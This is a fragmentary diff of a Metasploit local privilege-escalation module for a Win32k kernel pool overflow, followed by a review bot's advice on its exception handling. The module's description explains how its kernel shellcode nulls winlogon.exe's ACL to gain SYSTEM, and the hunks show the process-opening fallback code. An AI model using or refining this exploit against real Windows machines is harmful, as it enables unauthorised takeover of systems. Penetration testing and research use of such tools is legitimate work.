commit
faaf0787a5
|
@ -15,13 +15,13 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
include Msf::Post::Windows::Process
|
||||
include Msf::Post::Windows::FileInfo
|
||||
include Msf::Post::Windows::ReflectiveDLLInjection
|
||||
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info, {
|
||||
'Name' => 'Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei)',
|
||||
'Description' => %q{
|
||||
A kernel pool overflow in Win32k which allows local privilege escalation.
|
||||
The kernel shellcode nulls the ACL for the winlogon.exe process (a SYSTEM process).
|
||||
The kernel shellcode nulls the ACL for the winlogon.exe process (a SYSTEM process).
|
||||
This allows any unprivileged process to freely migrate to winlogon.exe, achieving
|
||||
privilege escalation. Used in pwn2own 2013 by MWR to break out of chrome's sandbox.
|
||||
NOTE: when you exit the meterpreter session, winlogon.exe is likely to crash.
|
||||
|
@ -106,7 +106,7 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
process = client.sys.process.open(notepad_process_pid, PROCESS_ALL_ACCESS)
|
||||
print_good("Process #{process.pid} launched.")
|
||||
rescue Rex::Post::Meterpreter::RequestError
|
||||
print_status("Operation failed. Trying to elevate the current process...")
|
||||
print_status("Operation failed. Hosting exploit in the current process...")
|
||||
process = client.sys.process.open
|
||||
end
|
||||
|
||||
|
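Review bot: The `rescue Rex::Post::Meterpreter::RequestError` branch in this hunk drops the exception, so the operator only sees "Operation failed" and never learns why opening the notepad process was refused before the module falls back to `client.sys.process.open` on the current process. Binding the exception costs one token: `rescue Rex::Post::Meterpreter::RequestError => e`, then include `#{e.message}` in the `print_status` text that follows. Since the fallback appears to host the exploit in the session's own process (per the status message), a one-line comment above `process = client.sys.process.open` stating that trade-off would make the rescue path easier to read. The enclosing method starts outside the hunk.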
|